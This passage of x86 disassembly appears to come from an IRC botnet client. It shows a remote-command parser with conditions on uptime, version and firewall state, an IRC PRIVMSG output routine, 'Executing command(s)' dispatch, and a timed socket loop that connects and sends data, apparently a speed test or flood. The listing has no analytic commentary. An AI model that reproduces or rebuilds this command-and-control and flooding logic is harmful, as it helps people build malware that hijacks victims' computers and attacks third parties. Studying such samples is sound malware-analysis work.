push dword ptr [eax+4]
call sub_416DEA ; memcmp
add esp, 0Ch
test eax, eax
jnz loc_40C35B
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-9]
mov [ebp+var_6398], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-8]
mov [ebp+var_6397], al
and [ebp+var_6396], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-7]
mov [ebp+var_6395], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-6]
mov [ebp+var_6394], al
and [ebp+var_6393], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-4]
mov [ebp+var_6392], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-3]
mov [ebp+var_6391], al
and [ebp+var_6390], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-2]
mov [ebp+var_638F], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-1]
mov [ebp+var_638E], al
and [ebp+var_638D], 0
lea eax, [ebp+var_638F]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6392]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6395]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6398]
push eax
call sub_40A8AD
pop ecx
push eax
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419860
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 1Ch
jmp short loc_40C375
; ---------------------------------------------------------------------------
loc_40C35B: ; CODE XREF: sub_40A9CF+1866�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419844
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C375: ; CODE XREF: sub_40A9CF+198A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C37A: ; CODE XREF: sub_40A9CF+1818�j
mov eax, [ebp+var_1A8]
sub eax, dword_419838
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C4B0
call sub_416B64 ; clock
mov [ebp+var_639C], eax
and [ebp+var_63A4], 0
and [ebp+var_63A0], 0
push 10h
push 0
lea eax, [ebp+var_63B4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_63B4], 2
loc_40C3C8: ; CODE XREF: sub_40A9CF+1A95�j
call sub_416B64 ; clock
sub eax, [ebp+var_639C]
cmp eax, 3E8h
jnb loc_40C469
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp+var_63B2], ax
push 4
push 0
call sub_4040E8
pop ecx
pop ecx
mov [ebp+var_63B0], eax
push 0
push 2
push 2
call ds:dword_417218 ; socket
mov [ebp+var_63B8], eax
push 10h
lea eax, [ebp+var_63B4]
push eax
push [ebp+var_63B8]
call ds:dword_4171F4 ; connect
push 0
push 1
lea eax, [ebp+var_63A0]
push eax
push [ebp+var_63B8]
call ds:dword_41720C ; send
push [ebp+var_63B8]
call ds:dword_417230 ; closesocket
mov eax, [ebp+var_63A4]
add eax, 2Bh
mov [ebp+var_63A4], eax
jmp loc_40C3C8
; ---------------------------------------------------------------------------
loc_40C469: ; CODE XREF: sub_40A9CF+1A09�j
cmp [ebp+var_63A4], 400h
jbe short loc_40C483
mov eax, [ebp+var_63A4]
mov [ebp+var_6408], eax
jmp short loc_40C48D
; ---------------------------------------------------------------------------
loc_40C483: ; CODE XREF: sub_40A9CF+1AA4�j
mov [ebp+var_6408], 400h
loc_40C48D: ; CODE XREF: sub_40A9CF+1AB2�j
mov eax, [ebp+var_6408]
shr eax, 0Ah
push eax
push offset dword_419820
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4B0: ; CODE XREF: sub_40A9CF+19BE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419818
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C4DA
mov eax, [ebp+var_1A8]
sub eax, dword_41980C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C4FF
loc_40C4DA: ; CODE XREF: sub_40A9CF+1AF4�j
push offset dword_41DC34
push 3B6h
push 0
push offset dword_4197E8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4FF: ; CODE XREF: sub_40A9CF+1B09�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C53A
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4142BF
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C53A: ; CODE XREF: sub_40A9CF+1B43�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197D4
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C564
mov eax, [ebp+var_1A8]
sub eax, dword_4197C8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C576
loc_40C564: ; CODE XREF: sub_40A9CF+1B7E�j
lea eax, [ebp+var_1A4]
push eax
call sub_4087C4
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C576: ; CODE XREF: sub_40A9CF+1B93�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197C0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C5A0
mov eax, [ebp+var_1A8]
sub eax, dword_4197B4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C5B2
loc_40C5A0: ; CODE XREF: sub_40A9CF+1BBA�j
lea eax, [ebp+var_1A4]
push eax
call sub_408E4A
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C5B2: ; CODE XREF: sub_40A9CF+1BCF�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197A4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C614
push 1
push offset a9252 ; "9252"
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_63BC], eax
push [ebp+var_63BC]
push offset dword_418B5C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
cmp [ebp+var_63BC], 0
jnz short loc_40C603
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C603: ; CODE XREF: sub_40A9CF+1C2D�j
push [ebp+var_63BC]
call sub_404CBB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C614: ; CODE XREF: sub_40A9CF+1BF6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419790
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C63B
lea eax, [ebp+var_1A4]
push eax
call sub_4091E2
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C63B: ; CODE XREF: sub_40A9CF+1C58�j
mov eax, [ebp+var_1A8]
sub eax, dword_419788
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C669
mov eax, [ebp+var_1A8]
sub eax, dword_41977C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C896
loc_40C669: ; CODE XREF: sub_40A9CF+1C7F�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C686
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_640C], eax
jmp short loc_40C68D
; ---------------------------------------------------------------------------
loc_40C686: ; CODE XREF: sub_40A9CF+1CA1�j
and [ebp+var_640C], 0
loc_40C68D: ; CODE XREF: sub_40A9CF+1CB5�j
mov eax, [ebp+var_640C]
mov [ebp+var_63C8], eax
call sub_4092A4
mov [ebp+var_63E0], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63D8], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63C4], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D4], eax
mov eax, [ebp+var_63D8]
cmp eax, [ebp+var_63C8]
jnb short loc_40C715
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C715: ; CODE XREF: sub_40A9CF+1D3F�j
call sub_409318
mov [ebp+var_63C0], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63CC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63DC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D0], eax
cmp [ebp+var_63D0], 1
jnz short loc_40C793
mov [ebp+var_6410], offset byte_41DE30
jmp short loc_40C79D
; ---------------------------------------------------------------------------
loc_40C793: ; CODE XREF: sub_40A9CF+1DB6�j
mov [ebp+var_6410], offset dword_4191F4
loc_40C79D: ; CODE XREF: sub_40A9CF+1DC2�j
cmp [ebp+var_63DC], 1
jnz short loc_40C7B2
mov [ebp+var_6414], offset byte_41DE30
jmp short loc_40C7BC
; ---------------------------------------------------------------------------
loc_40C7B2: ; CODE XREF: sub_40A9CF+1DD5�j
mov [ebp+var_6414], offset dword_4191F4
loc_40C7BC: ; CODE XREF: sub_40A9CF+1DE1�j
cmp [ebp+var_63CC], 1
jnz short loc_40C7D1
mov [ebp+var_6418], offset byte_41DE30
jmp short loc_40C7DB
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_40A9CF+1DF4�j
mov [ebp+var_6418], offset dword_4191F4
loc_40C7DB: ; CODE XREF: sub_40A9CF+1E00�j
cmp [ebp+var_63D4], 1
jnz short loc_40C7F0
mov [ebp+var_641C], offset byte_41DE30
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7F0: ; CODE XREF: sub_40A9CF+1E13�j
mov [ebp+var_641C], offset dword_4191F4
loc_40C7FA: ; CODE XREF: sub_40A9CF+1E1F�j
cmp [ebp+var_63C4], 1
jnz short loc_40C80F
mov [ebp+var_6420], offset byte_41DE30
jmp short loc_40C819
; ---------------------------------------------------------------------------
loc_40C80F: ; CODE XREF: sub_40A9CF+1E32�j
mov [ebp+var_6420], offset dword_4191F4
loc_40C819: ; CODE XREF: sub_40A9CF+1E3E�j
cmp [ebp+var_63D8], 1
jnz short loc_40C82E
mov [ebp+var_6424], offset byte_41DE30
jmp short loc_40C838
; ---------------------------------------------------------------------------
loc_40C82E: ; CODE XREF: sub_40A9CF+1E51�j
mov [ebp+var_6424], offset dword_4191F4
loc_40C838: ; CODE XREF: sub_40A9CF+1E5D�j
push [ebp+var_6410]
push [ebp+var_63D0]
push [ebp+var_6414]
push [ebp+var_63DC]
push [ebp+var_6418]
push [ebp+var_63CC]
push [ebp+var_641C]
push [ebp+var_63D4]
push [ebp+var_6420]
push [ebp+var_63C4]
push [ebp+var_6424]
push [ebp+var_63D8]
push offset dword_419708
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 38h
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C896: ; CODE XREF: sub_40A9CF+1C94�j
mov eax, [ebp+var_1A8]
sub eax, dword_419700
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C912
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C8BD
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jnz short loc_40C8BF
loc_40C8BD: ; CODE XREF: sub_40A9CF+1EE3�j
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C8BF: ; CODE XREF: sub_40A9CF+1EEC�j
push 2
push offset aId ; "id"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40C8EA
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41EEC8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40C8EA: ; CODE XREF: sub_40A9CF+1F07�j
push offset aUsername ; "username"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40C912
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41F048
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40C912: ; CODE XREF: sub_40A9CF+85�j
; sub_40A9CF+D8�j ...
pop edi
pop esi
leave
retn
sub_40A9CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C916 proc near ; CODE XREF: sub_40CA29+47F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_40C919: ; CODE XREF: sub_40C916+1F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_40C937
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C937
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_40C919
; ---------------------------------------------------------------------------
loc_40C937: ; CODE XREF: sub_40C916+C�j
; sub_40C916+16�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40C916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C93C proc near ; DATA XREF: sub_40CEB0+66�o
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_38F = byte ptr -38Fh
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 534h
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_534]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
lea eax, [ebp+var_530]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_204], eax
and [ebp+var_20C], 0
loc_40C98D: ; CODE XREF: sub_40C93C+D6�j
cmp [ebp+var_204], 0
jnz short loc_40C998
jmp short loc_40CA17
; ---------------------------------------------------------------------------
loc_40C998: ; CODE XREF: sub_40C93C+58�j
; sub_40C93C+79�j
mov eax, [ebp+var_204]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40C9A8
jmp short loc_40C9B7
; ---------------------------------------------------------------------------
loc_40C9A8: ; CODE XREF: sub_40C93C+68�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
jmp short loc_40C998
; ---------------------------------------------------------------------------
loc_40C9B7: ; CODE XREF: sub_40C93C+6A�j
push [ebp+var_204]
lea eax, [ebp+var_38F]
push eax
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_200]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_200]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_20C], eax
mov eax, [ebp+var_20C]
mov [ebp+var_204], eax
jmp loc_40C98D
; ---------------------------------------------------------------------------
loc_40CA17: ; CODE XREF: sub_40C93C+5A�j
push [ebp+var_534]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40C93C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA29 proc near ; CODE XREF: sub_40CEB0+8�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1C8 = byte ptr -1C8h
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = byte ptr -1A0h
var_190 = byte ptr -190h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ECh
cmp [ebp+arg_0], 0
jz short loc_40CA43
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 28h
jz short loc_40CA4A
loc_40CA43: ; CODE XREF: sub_40CA29+D�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA4A: ; CODE XREF: sub_40CA29+18�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push offset asc_419FB0 ; ")"
push [ebp+arg_0]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_40CA70
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA70: ; CODE XREF: sub_40CA29+3E�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
cmp eax, 180h
jbe short loc_40CA8A
mov [ebp+var_1EC], 180h
jmp short loc_40CA97
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_40CA29+53�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
mov [ebp+var_1EC], eax
loc_40CA97: ; CODE XREF: sub_40CA29+5F�j
push [ebp+var_1EC]
push [ebp+arg_0]
lea eax, [ebp+var_190]
push eax
call sub_407A56
add esp, 0Ch
push 1
push 1
lea eax, [ebp+var_190]
push eax
call sub_407C2C
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
lea eax, [ebp+var_190]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_4], eax
and [ebp+var_C], 0
loc_40CAE1: ; CODE XREF: sub_40CA29+475�j
cmp [ebp+var_4], 0
jnz short loc_40CAEC
jmp loc_40CEA3
; ---------------------------------------------------------------------------
loc_40CAEC: ; CODE XREF: sub_40CA29+BC�j
; sub_40CA29+D7�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40CAF9
jmp short loc_40CB02
; ---------------------------------------------------------------------------
loc_40CAF9: ; CODE XREF: sub_40CA29+CC�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_40CAEC
; ---------------------------------------------------------------------------
loc_40CB02: ; CODE XREF: sub_40CA29+CE�j
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_1A0]
push eax
lea eax, [ebp+var_1C8]
push eax
push offset a32s16s32s ; "%32s %16s %32s"
push [ebp+var_4]
call sub_416BA2 ; sscanf
add esp, 14h
cmp eax, 3
jz short loc_40CB33
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CB33: ; CODE XREF: sub_40CA29+101�j
lea eax, [ebp+var_1C8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A4], eax
lea eax, [ebp+var_1E8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A8], eax
cmp [ebp+var_1A4], 0
jnz loc_40CC6E
push offset dword_418F50
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz loc_40CC6E
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBB1
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A4], eax
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBB1: ; CODE XREF: sub_40CA29+16D�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBD7
mov [ebp+var_1A4], 3B6h
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBD7: ; CODE XREF: sub_40CA29+19D�j
push offset aFree ; "$free"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBFB
call sub_408E8E
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBFB: ; CODE XREF: sub_40CA29+1C3�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC1F
call sub_408887
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC1F: ; CODE XREF: sub_40CA29+1E7�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC43
call sub_404279
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC43: ; CODE XREF: sub_40CA29+20B�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC67
call sub_4043E9
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC67: ; CODE XREF: sub_40CA29+22F�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CC6E: ; CODE XREF: sub_40CA29+137�j
; sub_40CA29+152�j ...
cmp [ebp+var_1A8], 0
jnz loc_40CD83
push offset dword_418F50
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz loc_40CD83
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCC6
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A8], eax
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCC6: ; CODE XREF: sub_40CA29+282�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCEC
mov [ebp+var_1A8], 3B6h
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCEC: ; CODE XREF: sub_40CA29+2B2�j
push offset aFree ; "$free"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD10
call sub_408E8E
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD10: ; CODE XREF: sub_40CA29+2D8�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD34
call sub_408887
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD34: ; CODE XREF: sub_40CA29+2FC�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD58
call sub_404279
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD58: ; CODE XREF: sub_40CA29+320�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD7C
call sub_4043E9
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD7C: ; CODE XREF: sub_40CA29+344�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CD83: ; CODE XREF: sub_40CA29+24C�j
; sub_40CA29+267�j ...
push offset asc_419F5C ; "=="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDAF
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jz short loc_40CDAF
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDAF: ; CODE XREF: sub_40CA29+36F�j
; sub_40CA29+37D�j
push offset asc_419F58 ; "!="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDDB
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnz short loc_40CDDB
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDDB: ; CODE XREF: sub_40CA29+39B�j
; sub_40CA29+3A9�j
push offset asc_419F54 ; ">"
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE07
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
ja short loc_40CE07
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE07: ; CODE XREF: sub_40CA29+3C7�j
; sub_40CA29+3D5�j
push offset asc_419F50 ; ">="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE30
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnb short loc_40CE30
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE30: ; CODE XREF: sub_40CA29+3F3�j
; sub_40CA29+401�j
push offset dword_419968
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE59
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jb short loc_40CE59
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE59: ; CODE XREF: sub_40CA29+41C�j
; sub_40CA29+42A�j
push offset asc_419F4C ; "<="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE82
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jbe short loc_40CE82
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE82: ; CODE XREF: sub_40CA29+445�j
; sub_40CA29+453�j
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
jmp loc_40CAE1
; ---------------------------------------------------------------------------
loc_40CEA3: ; CODE XREF: sub_40CA29+BE�j
mov eax, [ebp+var_10]
inc eax
push eax
call sub_40C916
pop ecx
locret_40CEAE: ; CODE XREF: sub_40CA29+1C�j
; sub_40CA29+42�j ...
leave
retn
sub_40CA29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CEB0 proc near ; CODE XREF: sub_40A9CF+14CE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call sub_40CA29
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40CEC9
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: sub_40CEB0+15�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40CEDF
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEDF: ; CODE XREF: sub_40CEB0+2B�j
push 180h
push [ebp+var_8]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_8]
push offset aExecutingComma ; "Executing command(s): %s"
push 0
push [ebp+var_4]
push offset sub_40C93C
call sub_4095A4
add esp, 14h
locret_40CF23: ; CODE XREF: sub_40CEB0+17�j
; sub_40CEB0+2D�j
leave
retn
sub_40CEB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF25 proc near ; CODE XREF: sub_4020C2+B3�p
; sub_40D871+59B�p ...
push ebp
mov ebp, esp
mov eax, dword_41E9A4
pop ebp
retn
sub_40CF25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF2F proc near ; CODE XREF: sub_40D366+D�p
; sub_40D366+8E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
jz short loc_40CF9E
push [ebp+arg_0]
push offset dword_41E898
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_4], 0
jz short loc_40CF60
push [ebp+arg_4]
